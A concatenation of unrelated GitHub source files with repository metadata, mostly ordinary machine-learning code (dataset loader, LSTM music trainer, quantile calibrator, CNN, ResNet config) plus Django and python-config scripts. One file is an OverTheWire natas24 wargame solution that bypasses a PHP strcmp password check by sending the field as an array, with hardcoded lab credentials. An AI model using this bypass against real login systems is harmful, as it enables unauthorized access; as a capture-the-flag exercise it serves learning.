        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thihyd, cal2(p['HS'][2], p['0_H'][2], i), cal2(p['HS'][3], p['0_H'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd1, cal2(p['0_H'][2], p['HC'][2], i), cal2(p['0_H'][3], p['HC'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), cyshyd, cal2(p['H1'][2], p['HC'][2], i), cal2(p['H1'][3], p['HC'][3], i))
| [
"pietro.ga.aronica@gmail.com"
] | pietro.ga.aronica@gmail.com |
d1d241c2add6e0159fa0e8179c3b05ab3525eba9 | f95619ec6b6e48ccb4924cfd470db93e90018d64 | /natas24.py | a9db1478a15b10a57bf373717624f1f84cf11e7f | [] | no_license | kbjoon1011/trying_natas | 06b4d41178fba9f000851836aaecdff3185bbdfc | 89405e37a59ffd44197b05dff1eb2f2076a16e7d | refs/heads/master | 2021-07-12T18:10:48.202416 | 2020-06-30T07:41:35 | 2020-06-30T07:41:35 | 173,212,073 | 0 | 0 | null | 2019-09-06T06:40:18 | 2019-03-01T01:08:21 | Python | UTF-8 | Python | false | false | 709 | py | # Import Library
import requests
import re
from string import *
# OverTheWire natas24 exploit.
# PHP's strcmp() returns NULL (which compares == 0) when an array is compared
# to a string, so submitting the password field as an array ("passwd[]")
# bypasses the password check entirely.
username = 'natas24'
password = 'OsRmXFguozKpTZZ5X14zNO43379LZveg'
url = f'http://{username}.natas.labs.overthewire.org/'
session = requests.session()
# "strcmp()" returns 0 when Array is compared to String. Therefore, "passwd"
# is passed in as 'Array' on this level.
payloads = {"passwd[]": 'anything'}
response = session.request('POST', url, auth=(username, password), data=payloads)
print(response.cookies)
# The next level's password appears in the response body.
print(response.text)
| [
"noreply@github.com"
] | noreply@github.com |
7021279142a071fc08445c2a8ea30618db6c0aa1 | dc3fa1df498b45b28715e0db60ebed77cff4b41d | /my_dataset.py | 1f6ec36146f1d2344b8a346f2ee9695a00be4523 | [] | no_license | xqy0211/faster_rcnn | 5c1c87f938bed5f26fb22dd48e47d0f8651f0e74 | 328c894c04a6272e3387100248fbce4fd2feb6ac | refs/heads/master | 2023-01-25T01:19:41.353164 | 2020-12-12T07:21:20 | 2020-12-12T07:21:20 | 318,783,087 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,309 | py | from torch.utils.data import Dataset
import os
import torch
import json
from PIL import Image
from lxml import etree
class VOC2012DataSet(Dataset):
    """Read and parse a PASCAL VOC-layout detection dataset (here: PCB_DATASET)."""

    def __init__(self, voc_root, transforms, train_set=True):
        """
        :param voc_root: directory containing the "PCB_DATASET" folder
        :param transforms: callable applied to (image, target), or None
        :param train_set: use ImageSets/Main/train.txt when True, val.txt otherwise
        """
        # self.root = os.path.join(voc_root, "VOCdevkit", "VOC2012")
        self.root = os.path.join(voc_root, "PCB_DATASET")
        self.img_root = os.path.join(self.root, "JPEGImages")
        self.annotations_root = os.path.join(self.root, "Annotations")

        # read train.txt or val.txt file
        if train_set:
            txt_list = os.path.join(self.root, "ImageSets", "Main", "train.txt")
        else:
            txt_list = os.path.join(self.root, "ImageSets", "Main", "val.txt")

        with open(txt_list) as read:
            self.xml_list = [os.path.join(self.annotations_root, line.strip() + ".xml")
                             for line in read.readlines()]

        # read class_indict; a context manager guarantees the JSON file is
        # closed (the previous version leaked the handle)
        try:
            with open('./pcb_classes.json', 'r') as json_file:
                self.class_dict = json.load(json_file)
        except Exception as e:
            print(e)
            exit(-1)

        self.transforms = transforms

    def __len__(self):
        return len(self.xml_list)

    def _parse_annotation(self, idx):
        """Parse the idx-th annotation XML and return its "annotation" dict."""
        xml_path = self.xml_list[idx]
        with open(xml_path) as fid:
            xml_str = fid.read()
        xml = etree.fromstring(xml_str)
        return self.parse_xml_to_dict(xml)["annotation"]

    def _build_target(self, data, idx):
        """Convert a parsed annotation dict into the tensor target dict.

        Shared by __getitem__ and coco_index so the two stay consistent.
        """
        boxes = []
        labels = []
        iscrowd = []
        for obj in data["object"]:
            xmin = float(obj["bndbox"]["xmin"])
            xmax = float(obj["bndbox"]["xmax"])
            ymin = float(obj["bndbox"]["ymin"])
            ymax = float(obj["bndbox"]["ymax"])
            boxes.append([xmin, ymin, xmax, ymax])
            labels.append(self.class_dict[obj["name"]])
            iscrowd.append(int(obj["difficult"]))

        # convert everything into a torch.Tensor
        boxes = torch.as_tensor(boxes, dtype=torch.float32)
        labels = torch.as_tensor(labels, dtype=torch.int64)
        iscrowd = torch.as_tensor(iscrowd, dtype=torch.int64)
        image_id = torch.tensor([idx])
        area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])

        return {"boxes": boxes,
                "labels": labels,
                "image_id": image_id,
                "area": area,
                "iscrowd": iscrowd}

    def __getitem__(self, idx):
        """Return (image, target) for the idx-th sample."""
        data = self._parse_annotation(idx)

        img_path = os.path.join(self.img_root, data["filename"])
        image = Image.open(img_path)
        if image.format != "JPEG":
            raise ValueError("Image format not JPEG")

        target = self._build_target(data, idx)

        if self.transforms is not None:
            image, target = self.transforms(image, target)

        return image, target

    def get_height_and_width(self, idx):
        """Return (height, width) from the XML only — no image decoding."""
        data = self._parse_annotation(idx)
        data_height = int(data["size"]["height"])
        data_width = int(data["size"]["width"])
        return data_height, data_width

    def parse_xml_to_dict(self, xml):
        """
        Recursively convert an XML tree into nested dicts (modelled on
        tensorflow's recursive_parse_xml_to_dict).
        Args:
            xml: xml tree obtained by parsing XML file contents using lxml.etree
        Returns:
            Python dictionary holding XML contents.
        """
        if len(xml) == 0:  # leaf node: map the tag directly to its text
            return {xml.tag: xml.text}

        result = {}
        for child in xml:
            child_result = self.parse_xml_to_dict(child)  # recurse into children
            if child.tag != 'object':
                result[child.tag] = child_result[child.tag]
            else:
                # there may be several <object> elements, so collect them in a list
                if child.tag not in result:
                    result[child.tag] = []
                result[child.tag].append(child_result[child.tag])
        return {xml.tag: result}

    def coco_index(self, idx):
        """
        Label statistics for pycocotools: identical target dict to __getitem__
        but without reading/transforming the image, which makes it much faster.
        Args:
            idx: index of the sample to read
        """
        data = self._parse_annotation(idx)
        data_height = int(data["size"]["height"])
        data_width = int(data["size"]["width"])
        target = self._build_target(data, idx)
        return (data_height, data_width), target

    @staticmethod
    def collate_fn(batch):
        # Re-group a list of (image, target) pairs into (images, targets).
        return tuple(zip(*batch))
# import transforms
# from draw_box_utils import draw_box
# from PIL import Image
# import json
# import matplotlib.pyplot as plt
# import torchvision.transforms as ts
# import random
#
# # read class_indict
# category_index = {}
# try:
# json_file = open('./pascal_voc_classes.json', 'r')
# class_dict = json.load(json_file)
# category_index = {v: k for k, v in class_dict.items()}
# except Exception as e:
# print(e)
# exit(-1)
#
# data_transform = {
# "train": transforms.Compose([transforms.ToTensor(),
# transforms.RandomHorizontalFlip(0.5)]),
# "val": transforms.Compose([transforms.ToTensor()])
# }
#
# # load train data set
# train_data_set = VOC2012DataSet(os.getcwd(), data_transform["train"], True)
# print(len(train_data_set))
# for index in random.sample(range(0, len(train_data_set)), k=5):
# img, target = train_data_set[index]
# img = ts.ToPILImage()(img)
# draw_box(img,
# target["boxes"].numpy(),
# target["labels"].numpy(),
# [1 for i in range(len(target["labels"].numpy()))],
# category_index,
# thresh=0.5,
# line_thickness=5)
# plt.imshow(img)
# plt.show()
| [
"470400752@qq.com"
] | 470400752@qq.com |
846bdb08818dce817fd9f23868a5458ba0eb8d00 | 654bbd11f1ef5f3d18286d2fb75ea5c19ad47c3b | /CurrencyCoverter/manage.py | 6e7763b6056a56916ee101048a5046fc163ed4b2 | [] | no_license | skrishna87/Akamai | aade53be37795d7151565d2aeb6d298f3162df41 | 72e371b0f00561607827c8ba504851c3f65ca6e5 | refs/heads/master | 2020-03-31T19:20:15.761288 | 2018-10-10T21:43:25 | 2018-10-10T21:43:25 | 152,493,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings module before importing Django.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CurrencyCoverter.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        # Django itself imports fine, so re-raise the original error.
        raise
    # Dispatch to the management command given on the command line.
    execute_from_command_line(sys.argv)
| [
"ravi.saikrishna487@gmail.com"
] | ravi.saikrishna487@gmail.com |
9d037d0f654b7e5df4a3bf99fa9ed431c77c6f26 | 3600cfce9f2a36cb47f4bd6e163db5cd2bac5a79 | /lstmOffsets.py | d7f821ef0207c7125d8b8eff149fb2a5b4459423 | [] | no_license | posegae/Classical-Piano-Composer | 30940c1881ae5346c98c51699e9903a987bbb73d | 3058ffcb3c2510839527cca86b97faa53bee4d97 | refs/heads/master | 2021-09-09T09:49:31.592500 | 2018-03-14T21:38:10 | 2018-03-14T21:38:10 | 124,789,316 | 0 | 0 | null | 2018-03-11T19:10:39 | 2018-03-11T19:10:39 | null | UTF-8 | Python | false | false | 4,787 | py | """ This module prepares midi file data and feeds it to the neural
network for training """
import glob
import pickle
import numpy
from music21 import converter, instrument, note, chord, corpus
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import Activation
from keras.utils import np_utils
from keras.callbacks import ModelCheckpoint
def train_network():
    """Train a Neural Network to generate music"""
    notes = get_notes_and_offsets()
    # vocabulary size = number of distinct (pitch, offset) pairs
    n_vocab = len({tuple(entry) for entry in notes})
    network_input, network_output = prepare_sequences_with_offsets(notes, n_vocab)
    model = create_network(network_input, n_vocab)
    train(model, network_input, network_output)
def get_notes_and_offsets():
    """Collect notes/chords plus inter-note gaps from ./midi_music_pop.

    Each returned entry is [pitch-or-chord-string, gap], where the gap is
    the distance from the previously recorded note's offset.  The list is
    also pickled to data/notes.
    """
    notes = []
    for midi_path in glob.glob('midi_music_pop/*.mid'):
        midi = converter.parse(midi_path)
        parts = instrument.partitionByInstrument(midi)
        if parts:
            notes_to_parse = parts.parts[0].recurse()
        else:
            notes_to_parse = midi.flat.notes
        prev_note_offset = 0
        for element in notes_to_parse:
            # Only Note and Chord elements are recorded; everything else
            # (rests, meta events) is skipped.
            if isinstance(element, note.Note):
                label = str(element.pitch)
            elif isinstance(element, chord.Chord):
                label = '.'.join(str(n) for n in element.normalOrder)
            else:
                continue
            gap = element.offset - prev_note_offset
            notes.append([label, gap])
            prev_note_offset += gap
    with open('data/notes', 'wb') as filepath:
        pickle.dump(notes, filepath)
    return notes
def prepare_sequences_with_offsets(notes, n_vocab):
    """Prepare the (input, output) sequences used by the NN, with offsets.

    :param notes: list of [pitch_string, offset] pairs
    :param n_vocab: number of distinct (pitch, offset) pairs; used to
                    normalise the integer-encoded inputs into [0, 1)
    :return: (network_input, network_output) where network_input has shape
             (n_patterns, 100, 2) — the 2 features are the pitch index and
             the offset index — and network_output is a list of
             [pitch_index, offset_index] pairs.
    """
    sequence_length = 100

    # Integer-encode pitches and offset values separately.
    pitches = sorted(set(n[0] for n in notes))
    offsets = sorted(set(n[1] for n in notes))
    pitch_to_int = dict((pitch, number) for number, pitch in enumerate(pitches))
    offset_to_int = dict((offset, number) for number, offset in enumerate(offsets))

    network_input = []
    network_output = []
    for i in range(0, len(notes) - sequence_length, 1):
        sequence_in = notes[i:i + sequence_length]
        sequence_out = notes[i + sequence_length]
        network_input.append([[pitch_to_int[char[0]], offset_to_int[char[1]]] for char in sequence_in])
        network_output.append([pitch_to_int[sequence_out[0]], offset_to_int[sequence_out[1]]])

    n_patterns = len(network_input)
    # trailing 2 = number of features per timestep (pitch index, offset index)
    network_input = numpy.reshape(network_input, (n_patterns, sequence_length, 2))
    network_input = network_input / float(n_vocab)
    return (network_input, network_output)
def create_network(network_input, n_vocab):
    """create the structure of the neural network"""
    layers = [
        LSTM(512,
             input_shape=(network_input.shape[1], network_input.shape[2]),
             return_sequences=True),
        Dropout(0.3),
        LSTM(512, return_sequences=True),
        Dropout(0.3),
        LSTM(512),
        Dense(256),
        Dropout(0.3),
        Dense(n_vocab),
        Activation('softmax'),
    ]
    model = Sequential()
    for layer in layers:
        model.add(layer)
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
    return model
def train(model, network_input, network_output):
    """train the neural network"""
    # Checkpoint the weights whenever the loss improves.
    weights_path = "weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5"
    checkpoint = ModelCheckpoint(weights_path,
                                 monitor='loss',
                                 verbose=0,
                                 save_best_only=True,
                                 mode='min')
    model.fit(network_input, network_output,
              epochs=200, batch_size=64, callbacks=[checkpoint])
# Run the full training pipeline when executed as a script.
if __name__ == '__main__':
    train_network()
| [
"kimj4@carleton.edu"
] | kimj4@carleton.edu |
23deb704af1f8cd1bc2715d88d529d49ae767199 | d59ff5567a8256fc880de3502d285afbfeb1ef69 | /week 5/5.3.23/5.3.py | 6a39f72e47e5fcdaff0ea5b247f0287ecc13bfe8 | [] | no_license | allertjan/LearningCommunityBasicTrack | a87628c84cbefdf844a43cf0f395588da0a97acd | efd6cc816bff9298438567b3eb7113a0e665c4e1 | refs/heads/master | 2023-01-23T21:40:40.250138 | 2020-11-28T13:03:35 | 2020-11-28T13:03:35 | 296,364,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | a = [1, 2, 3]
b = a[:] # shallow copy: b gets the same values as a but is an independent list
b[0] = 5 # 1 becomes 5 in b only; a is unchanged because the lists are separate
print(a, b)
| [
"allertjandillema@hotmail.com"
] | allertjandillema@hotmail.com |
76f56b2e1147da2cc1383c9b0f44b4455a284784 | 9e236f93f5f4d55af0e98dac56866c976899ee1d | /.c9/metadata/workspace/Unused/NotUseful/simple_minimax.py | ba320906d26f7aa4d90441253fd5b1a7230f5521 | [] | no_license | willyao99/botterthanyouAI | 965f13dea2437aa4d65301701415ba8977b5640e | 95792d842c654b6593fe7a895a6ba1266aa01cb7 | refs/heads/master | 2021-05-02T06:34:55.721476 | 2017-12-07T14:47:13 | 2017-12-07T14:47:13 | 120,860,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | {"filter":false,"title":"simple_minimax.py","tooltip":"/Unused/NotUseful/simple_minimax.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":205.5,"scrollleft":0,"selection":{"start":{"row":30,"column":90},"end":{"row":30,"column":90},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":{"row":11,"state":"start","mode":"ace/mode/python"}},"timestamp":1512540234859,"hash":"c7c425ccb8a71d49840fedb127201a5e87dfbd18"} | [
"willyao99@users.noreply.github.com"
] | willyao99@users.noreply.github.com |
de097aeaaba5ac51a54c7c99814d12be1d0fa4e7 | da9f629b113d11b72f7d9f704be98bc9ec5a132c | /project/opencv/face recg/adhoc_ML_june4th11-master/sML_example.py | 9d139eafa3b3e4265ea08e1110b0de8e38148f40 | [
"Apache-2.0"
] | permissive | 19ANDY/major_project | 23f942f380bc899bf68e1fd57f717b38673dc547 | bddefd8e966c40d5fea609b9a474891b66397c86 | refs/heads/master | 2020-04-27T07:35:26.128175 | 2019-03-06T13:17:12 | 2019-03-06T13:17:12 | 174,140,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #!/usr/bin/python3
from sklearn import tree
# Toy training set of fruit samples: [weight, texture] pairs,
# where texture 0 means smooth and 1 means bumpy.
data = [[100, 0], [130, 0], [135, 1], [150, 1]]
output = ["apple", "apple", "orange", "orange"]
# Build a decision-tree classifier.
algo = tree.DecisionTreeClassifier()
# Fit it to the labelled examples.
trained_algo = algo.fit(data, output)
# Classify one unseen sample.
predict = trained_algo.predict([[126, 1]])
# Show the predicted label.
print(predict)
| [
"geniusrishabhanand@gmail.com"
] | geniusrishabhanand@gmail.com |
80d6c362bd2064ec7c636917764eb9a719bdfc76 | d84218df20950c0b80cc5c5cb8d32ec0e5c59882 | /QuantileCalibrator.py | 267af139d1e8e0ffaaf5b030eaab83d875546ae8 | [
"MIT"
] | permissive | weirichd/quantile-calibration | 74bbab53416a853909f090009e3521a42324f1a9 | 55c4bee99b34ba6661d86287d24fb3cd2edd8736 | refs/heads/master | 2020-03-11T17:23:43.696123 | 2019-10-07T15:29:17 | 2019-10-07T15:29:17 | 130,145,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,604 | py | from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin
import pandas as pd
import numpy as np
from scipy.optimize import minimize
class QuantileCalibrator(BaseEstimator, TransformerMixin, RegressorMixin):
    """
    Calibrates regression predictions by quantile binning: fit() buckets the
    training predictions into quantiles with ``pd.qcut`` and maps each bucket
    to the mean ground-truth value observed in it, optionally smoothed by a
    regularized isotonic (monotone non-decreasing) least-squares fit.
    transform()/predict() then look each new prediction up in that table.
    """
    def __init__(self, quantile=10, isotonic_fit=True, isotonic_lambda=1):
        """
        Create a quantile transformer class.
        :param quantile: Either an integer, or an array-like of floats.
        :param isotonic_fit: If true, regularize with an isotonic fit.
        :param isotonic_lambda: Lambda parameter for 3rd derivative regularization.
        """
        self.quantile = quantile
        self.isotonic_fit = isotonic_fit
        self.isotonic_lambda = isotonic_lambda
    # TODO: Can this be one line? If I can figure out how to add in extra rows it could be...
    def _lookup(self, val):
        # lookup_table_ is indexed by the IntervalIndex produced by pd.qcut;
        # values outside the fitted range are clamped to the first/last bucket.
        if val >= self.lookup_table_.index[-1].right:
            return self.lookup_table_.iloc[-1]
        elif val <= self.lookup_table_.index[0].left:
            return self.lookup_table_.iloc[0]
        else:
            return self.lookup_table_[val]
    @staticmethod
    def _ls_min_func(y_fit, y, lamb):
        # Least-squares distance to y, plus lamb times the squared third
        # differences of the candidate fit (a smoothness penalty).
        D3_y_fit = np.diff(np.diff(np.diff(y_fit)))
        return np.inner(y - y_fit, y - y_fit) + lamb * np.inner(D3_y_fit, D3_y_fit)
    def _isotonic_fit(self, X):
        # Monotone fit: consecutive differences constrained non-negative.
        cons = ({'type': 'ineq', 'fun': lambda x: np.diff(x)})
        return minimize(self._ls_min_func,
                        x0=X,
                        args=(X, self.isotonic_lambda),
                        method='SLSQP',
                        constraints=cons).x
    def fit(self, X, y):
        """
        Fit the quantile calibration transformer.
        :param X: Array like which contains the predicted values.
        :param y: Array like which contains the ground truth values.
        :return: self
        """
        self.lookup_table_ = pd.Series(y).groupby(pd.qcut(X, self.quantile)).mean()
        if self.isotonic_fit:
            self.lookup_table_[:] = self._isotonic_fit(self.lookup_table_.values)
        return self
    def transform(self, X, y=None):
        """
        Transform a vector via the lookup table.
        :param X: Vector to transform
        :param y: Ignored. Only included to be compatible w/ sklearn requirements for Transformers
        :return: numpy array with every element of X mapped through the fitted lookup table
        """
        return np.array([self._lookup(a) for a in X])
    def predict(self, X):
        """
        Wrapper around transform, so the calibrator also satisfies the
        RegressorMixin interface and can be used as the final estimator
        in a pipeline.
        :param X: Vector to transform
        :return: the calibrated values for X
        """
        return self.transform(X)
| [
"weirich.david@gmail.com"
] | weirich.david@gmail.com |
1525e2e2d2e715d3f640e003e5a1000e87c91931 | 37707f88f230090102bf39170ae15fffeb190a34 | /add_two_digits.py | ee51482b3659e0f7845117d01bb6991d906319e0 | [] | no_license | georgericardo26/python_algorithm | aee12c19d525c4f69056ea65aebeb5a31e680edf | fb2db3f96ad4ef223d7724c93303e4fece728bb3 | refs/heads/main | 2023-02-20T04:34:47.449899 | 2021-01-22T21:19:01 | 2021-01-22T21:19:01 | 332,064,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | def addTwoDigits(n):
num_str = str(n)
convert_to_list = [int(n) for n in num_str]
return sum(convert_to_list)
if __name__ == '__main__':
print(addTwoDigits(295)) | [
"george@MacBook-Pro-de-George.local"
] | george@MacBook-Pro-de-George.local |
c6af5696f5ea39b3401dc74c5a8163a11ed4ec24 | f7c4b0ee7cfb02f7ba7e4f58931df86b3ae3f2ce | /myEnvironments/djangoEnv/bin/python-config | e9e2009525ae5126801f82f94856ae3f173c56ca | [
"MIT"
] | permissive | hravnaas/python_lessons | 85f14d07a68a103bf7e1c99cb71fe72e3e79ac2c | bd9215c279a02eb4e42c4a6af347430ed8bad1cd | refs/heads/master | 2020-04-21T01:05:40.293643 | 2016-09-24T14:56:47 | 2016-09-24T14:56:47 | 67,646,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,380 | #!/Users/hravnaas/Documents/dojo/python/myEnvironments/djangoEnv/bin/python
import sys
import getopt
import sysconfig
# Long options accepted on the command line; newer interpreter versions
# accept a few extra ones.
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
              'ldflags', 'help']
if sys.version_info >= (3, 2):
    # insert(-1, ...) places the option just before the final list element.
    valid_opts.insert(-1, 'extension-suffix')
    valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
    valid_opts.append('configdir')
def exit_with_usage(code=1):
    """Write the usage line to stderr and terminate with exit status *code*."""
    options = '|'.join('--' + opt for opt in valid_opts)
    message = "Usage: {0} [{1}]\n".format(sys.argv[0], options)
    sys.stderr.write(message)
    sys.exit(code)
# Parse long options only (no short options); unknown options are a usage error.
try:
    opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
    exit_with_usage()
if not opts:
    exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
# Shorthand used repeatedly in the dispatch loop below.
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
    exit_with_usage(code=0)
# Emit one line of output per requested option, in the order they were given.
for opt in opt_flags:
    if opt == '--prefix':
        print(sysconfig.get_config_var('prefix'))
    elif opt == '--exec-prefix':
        print(sysconfig.get_config_var('exec_prefix'))
    elif opt in ('--includes', '--cflags'):
        # Both the platform-independent and platform-specific include dirs.
        flags = ['-I' + sysconfig.get_path('include'),
                 '-I' + sysconfig.get_path('platinclude')]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print(' '.join(flags))
    elif opt in ('--libs', '--ldflags'):
        abiflags = getattr(sys, 'abiflags', '')
        libs = ['-lpython' + pyver + abiflags]
        libs += getvar('LIBS').split()
        libs += getvar('SYSLIBS').split()
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print(' '.join(libs))
    elif opt == '--extension-suffix':
        # 'SO' is the older (pre-3.4) name of the 'EXT_SUFFIX' config variable.
        ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
        if ext_suffix is None:
            ext_suffix = sysconfig.get_config_var('SO')
        print(ext_suffix)
    elif opt == '--abiflags':
        # sys.abiflags only exists on Python 3.2+; otherwise it is a usage error.
        if not getattr(sys, 'abiflags', None):
            exit_with_usage()
        print(sys.abiflags)
    elif opt == '--configdir':
        print(sysconfig.get_config_var('LIBPL'))
| [
"hravnaas@hotmail.com"
] | hravnaas@hotmail.com | |
a076b97fb70a2d662c6b848e799fc44bb094a6f7 | c142423081636186bdeb128d2a0d160ba982c6e1 | /models/v6.py | 54b8e11f841da677f5fafaba6bd318a5c97ee961 | [] | no_license | IQbrod/NeuralNetwork2 | 61da9a407aea86289f59cb6259e9d25ec5fa7075 | e32fcef670025a43655b3b14351895f82b6c781d | refs/heads/master | 2020-04-19T16:43:42.245450 | 2019-03-27T12:50:44 | 2019-03-27T12:50:44 | 168,312,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | import torch.nn as nn
import torch.nn.functional as F
# Network definition
class Net(nn.Module):
    """Small convolutional classifier for 3x32x32 inputs with 10 output classes."""

    def __init__(self):
        super(Net, self).__init__()
        # Layer creation order is kept unchanged so seeded parameter
        # initialization stays reproducible.
        self.conv1 = nn.Conv2d(3, 5, 3)
        self.conv2 = nn.Conv2d(5, 8, 3)
        self.pool = nn.MaxPool2d(2, 2)
        self.conv3 = nn.Conv2d(8, 14, 3)
        self.conv4 = nn.Conv2d(14, 20, 3)
        self.fc1 = nn.Linear(20 * 5 * 5, 200)
        self.fc2 = nn.Linear(200, 96)
        self.fc3 = nn.Linear(96, 10)

    def forward(self, x):
        # Stage 1: two stacked convolutions, then ReLU and 2x2 max-pooling.
        x = self.conv2(self.conv1(x))
        x = self.pool(F.relu(x))
        # Stage 2: same pattern with the deeper convolution pair.
        x = self.conv4(self.conv3(x))
        x = self.pool(F.relu(x))
        # Flatten to (batch, 20*5*5) for the fully connected head.
        x = x.view(-1, 20 * 5 * 5)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        return self.fc3(x)
    def op_counter(self,data,display):
        # Placeholder: operation counting is not implemented; always reports 0.
        return 0 | [
"iqbrod@outlook.fr"
] | iqbrod@outlook.fr |
ddc63c6224b12cab076c57a1befe90aa8086f5d6 | a95ee3b0d45a57de839be2191fb05ca050c68e10 | /benchmark/paddle/image/resnet.py | 6ae1857642e8df4b3859eec68a3a5227d1c4fcb3 | [
"Apache-2.0"
] | permissive | shiyazhou121/Paddle | 3ea1f5a4f4792e227cce74d074b73212db74c490 | 4adc8a7aa1d78e9c37d285007eb9e2a6e2e1e180 | refs/heads/develop | 2021-08-12T03:46:01.899369 | 2017-11-14T10:37:06 | 2017-11-14T10:37:06 | 110,681,390 | 1 | 0 | null | 2017-11-14T11:24:05 | 2017-11-14T11:24:05 | null | UTF-8 | Python | false | false | 6,115 | py | #!/usr/bin/env python
from paddle.trainer_config_helpers import *
# ImageNet-sized input and the standard 1000-way classification head.
height = 224
width = 224
num_class = 1000
# Values may be overridden from the trainer command line via get_config_arg.
batch_size = get_config_arg('batch_size', int, 64)
layer_num = get_config_arg("layer_num", int, 50)
is_test = get_config_arg("is_test", bool, False)
args = {'height': height, 'width': width, 'color': True, 'num_class': num_class}
define_py_data_sources2(
    "train.list", None, module="provider", obj="process", args=args)
settings(
    batch_size=batch_size,
    learning_rate=0.01 / batch_size,
    learning_method=MomentumOptimizer(0.9),
    regularization=L2Regularization(0.0005 * batch_size))
#######################Network Configuration #############
def conv_bn_layer(name,
                  input,
                  filter_size,
                  num_filters,
                  stride,
                  padding,
                  channels=None,
                  active_type=ReluActivation()):
    """
    Build a convolution immediately followed by batch normalization.

    The convolution itself is purely linear (no bias, no activation);
    the requested activation is applied by the batch-norm layer instead.
    """
    conv = img_conv_layer(
        name=name + "_conv",
        input=input,
        filter_size=filter_size,
        num_channels=channels,
        num_filters=num_filters,
        stride=stride,
        padding=padding,
        act=LinearActivation(),
        bias_attr=False)
    return batch_norm_layer(
        name=name + "_bn",
        input=conv,
        act=active_type,
        use_global_stats=is_test)
def bottleneck_block(name, input, num_filters1, num_filters2):
    """
    Identity-shortcut bottleneck block: 1x1 -> 3x3 -> 1x1 convolutions.

    The last conv_bn_layer stays linear; ReLU is applied only after the
    residual addition, matching the original ResNet design.
    """
    out = conv_bn_layer(
        name=name + '_branch2a',
        input=input,
        filter_size=1,
        num_filters=num_filters1,
        stride=1,
        padding=0)
    out = conv_bn_layer(
        name=name + '_branch2b',
        input=out,
        filter_size=3,
        num_filters=num_filters1,
        stride=1,
        padding=1)
    out = conv_bn_layer(
        name=name + '_branch2c',
        input=out,
        filter_size=1,
        num_filters=num_filters2,
        stride=1,
        padding=0,
        active_type=LinearActivation())
    return addto_layer(
        name=name + "_addto", input=[input, out], act=ReluActivation())
def mid_projection(name, input, num_filters1, num_filters2, stride=2):
    """
    A wrapper for the middle projection block in ResNet.
    Projection shortcuts are used when dimensions increase;
    all other shortcuts are identity.
    branch1: projection shortcut used for increasing
    dimensions, has no activation.
    branch2x: bottleneck building block, shortcuts are identity.
    """
    # stride = 2
    # Projection shortcut: 1x1 conv matching the output channel count.
    branch1 = conv_bn_layer(
        name=name + '_branch1',
        input=input,
        filter_size=1,
        num_filters=num_filters2,
        stride=stride,
        padding=0,
        active_type=LinearActivation())
    last_name = conv_bn_layer(
        name=name + '_branch2a',
        input=input,
        filter_size=1,
        num_filters=num_filters1,
        stride=stride,
        padding=0)
    last_name = conv_bn_layer(
        name=name + '_branch2b',
        input=last_name,
        filter_size=3,
        num_filters=num_filters1,
        stride=1,
        padding=1)
    # Final 1x1 conv is linear; ReLU is applied after the residual addition.
    last_name = conv_bn_layer(
        name=name + '_branch2c',
        input=last_name,
        filter_size=1,
        num_filters=num_filters2,
        stride=1,
        padding=0,
        active_type=LinearActivation())
    return addto_layer(
        name=name + "_addto", input=[branch1, last_name], act=ReluActivation())
img = data_layer(name='image', size=height * width * 3)
def deep_res_net(res2_num=3, res3_num=4, res4_num=6, res5_num=3):
    """
    A wrapper for the 50/101/152-layer variants of ResNet.
    res2_num: number of blocks stacked in conv2_x
    res3_num: number of blocks stacked in conv3_x
    res4_num: number of blocks stacked in conv4_x
    res5_num: number of blocks stacked in conv5_x
    """
    # For ImageNet
    # conv1: 112x112
    tmp = conv_bn_layer(
        "conv1",
        input=img,
        filter_size=7,
        channels=3,
        num_filters=64,
        stride=2,
        padding=3)
    tmp = img_pool_layer(name="pool1", input=tmp, pool_size=3, stride=2)
    # conv2_x: 56x56
    # Each stage starts with a projection block, then identity bottlenecks.
    tmp = mid_projection(
        name="res2_1", input=tmp, num_filters1=64, num_filters2=256, stride=1)
